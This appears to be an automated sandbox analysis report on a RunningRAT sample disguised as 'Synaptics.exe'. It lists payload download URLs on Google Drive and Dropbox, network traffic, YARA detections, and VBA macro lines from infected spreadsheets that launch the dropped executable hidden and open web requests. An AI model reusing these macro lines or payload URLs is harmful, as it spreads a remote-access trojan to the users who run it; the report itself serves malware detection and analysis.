                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqc
                          Source: Synaptics.exe, 00000003.00000002.2992281499.000000001D9E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq~
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                          Source: Synaptics.exe, 00000003.00000002.2992581261.000000001DA4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr)
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr4
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrC
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrm-Ve
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrs
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrver
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2959392597.000000000E7DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsOGlEI
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadscal
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsoq#e
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadspre9
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsq#
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadss
                          Source: Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadstna
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadstnam
                          Source: Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadstnamS/
                          Source: Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadstnams
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2997458148.000000001DD14000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3000353585.000000001DF15000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                          Source: Synaptics.exe, 00000003.00000002.2943935308.0000000007630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt-CH
                          Source: Synaptics.exe, 00000003.00000002.2957759712.000000000E6C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt.
                          Source: Synaptics.exe, 00000003.00000002.2946052719.00000000077C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtY$
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtche
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2958564294.000000000E758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtl
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtl/uW
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2960427005.000000000E874000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2995091873.000000001DB6F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2996750928.000000001DC5D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtlen
                          Source: Synaptics.exe, 00000003.00000002.2995790141.000000001DBE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtlen$
                          Source: Synaptics.exe, 00000003.00000002.2998989997.000000001DE0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtlenh
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2940590142.00000000055C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtleni
                          Source: blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, RCXAFD2.tmp.0.dr, ~DF601ED631F8CE1B03.TMP.5.dr, Synaptics.exe.0.dr, ~$cache1.3.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                          Source: Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                          Source: Synaptics.exe, 00000003.00000002.2962131638.000000000E9CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007692000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2943935308.0000000007678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                          Source: blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, RCXAFD2.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                          Source: blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, RCXAFD2.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                          Source: blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, RCXAFD2.tmp.0.dr, ~DF601ED631F8CE1B03.TMP.5.dr, Synaptics.exe.0.dr, ~$cache1.3.drString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49735 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49734 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49747 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49746 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49758 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49759 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49766 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49767 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49780 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49781 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49784 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49785 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49786 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49787 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49796 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49797 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49808 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49807 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49812 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49813 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49814 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49815 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49823 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49822 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49823 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49828 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49827 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49829 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49830 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49838 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49839 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49842 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49844 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49852 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49853 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49861 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49862 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49873 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49872 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49877 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49878 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49889 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49888 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49897 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49899 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49917 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49918 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49927 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49929 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49928 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49926 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49928 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49944 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49943 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49962 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49963 version: TLS 1.2

                          E-Banking Fraud

                          Source: C:\Windows\SysWOW64\svchost.exe Code function: strlen,memset,lstrlenA,strstr,lstrcpyA,CreateProcessA, Applications\iexplore.exe\shell\open\command 4_2_10002BC3

                          System Summary

                          Source: blq.exe, type: SAMPLE Matched rule: Detects RunningRAT Author: ditekSHen
                          Source: 10.2.encvbk.exe.10000000.1.unpack, type: UNPACKEDPE Matched rule: Detects RunningRAT Author: ditekSHen
                          Source: 1.2.._cache_blq.exe.4032a0.1.unpack, type: UNPACKEDPE Matched rule: Detects RunningRAT Author: ditekSHen
                          Source: 1.0.._cache_blq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Running RAT from Gold Dragon report Author: Florian Roth
                          Source: 1.0.._cache_blq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RunningRAT Author: ditekSHen
                          Source: 0.3.blq.exe.748e74.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Running RAT from Gold Dragon report Author: Florian Roth
                          Source: 0.3.blq.exe.748e74.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RunningRAT Author: ditekSHen
                          Source: 1.2.._cache_blq.exe.4032a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RunningRAT Author: ditekSHen
                          Source: 4.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPE Matched rule: Detects RunningRAT Author: ditekSHen
                          Source: 0.3.blq.exe.748e74.0.unpack, type: UNPACKEDPE Matched rule: Detects Running RAT from Gold Dragon report Author: Florian Roth
                          Source: 0.3.blq.exe.748e74.0.unpack, type: UNPACKEDPE Matched rule: Detects RunningRAT Author: ditekSHen
                          Source: 0.0.blq.exe.4b8e14.1.unpack, type: UNPACKEDPE Matched rule: Detects Running RAT from Gold Dragon report Author: Florian Roth
                          Source: 0.0.blq.exe.4b8e14.1.unpack, type: UNPACKEDPE Matched rule: Detects RunningRAT Author: ditekSHen
                          Source: 0.0.blq.exe.4b8e14.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Running RAT from Gold Dragon report Author: Florian Roth
                          Source: 0.0.blq.exe.4b8e14.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RunningRAT Author: ditekSHen
                          Source: 1.2.._cache_blq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RunningRAT Author: ditekSHen
                          Source: 0.0.blq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RunningRAT Author: ditekSHen
                          Source: C:\Users\user\Desktop\._cache_blq.exe, type: DROPPED Matched rule: Detects Running RAT from Gold Dragon report Author: Florian Roth
                          Source: C:\Users\user\Desktop\._cache_blq.exe, type: DROPPED Matched rule: Detects RunningRAT Author: ditekSHen
                          Source: C:\Program Files (x86)\6795234.dll, type: DROPPED Matched rule: Detects RunningRAT Author: ditekSHen
                          Source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED Matched rule: Detects RunningRAT Author: ditekSHen
                          Source: OslfsL4J.xlsm.3.dr OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                          Source: OslfsL4J.xlsm.3.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: OslfsL4J.xlsm.3.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: OslfsL4J.xlsm.3.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: OslfsL4J.xlsm.3.dr OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                          Source: OslfsL4J.xlsm.3.dr OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                          Source: OslfsL4J.xlsm.3.dr OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                          Source: OslfsL4J.xlsm.3.dr OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                          Source: OslfsL4J.xlsm.3.dr OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                          Source: OslfsL4J.xlsm.3.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                          Source: OslfsL4J.xlsm.3.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                          Source: XZXHAVGRAG.xlsm.3.dr OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                          Source: XZXHAVGRAG.xlsm.3.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: XZXHAVGRAG.xlsm.3.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: XZXHAVGRAG.xlsm.3.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: XZXHAVGRAG.xlsm.3.dr OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                          Source: XZXHAVGRAG.xlsm.3.dr OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                          Source: XZXHAVGRAG.xlsm.3.dr OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                          Source: XZXHAVGRAG.xlsm.3.dr OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                          Source: XZXHAVGRAG.xlsm.3.dr OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                          Source: XZXHAVGRAG.xlsm.3.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
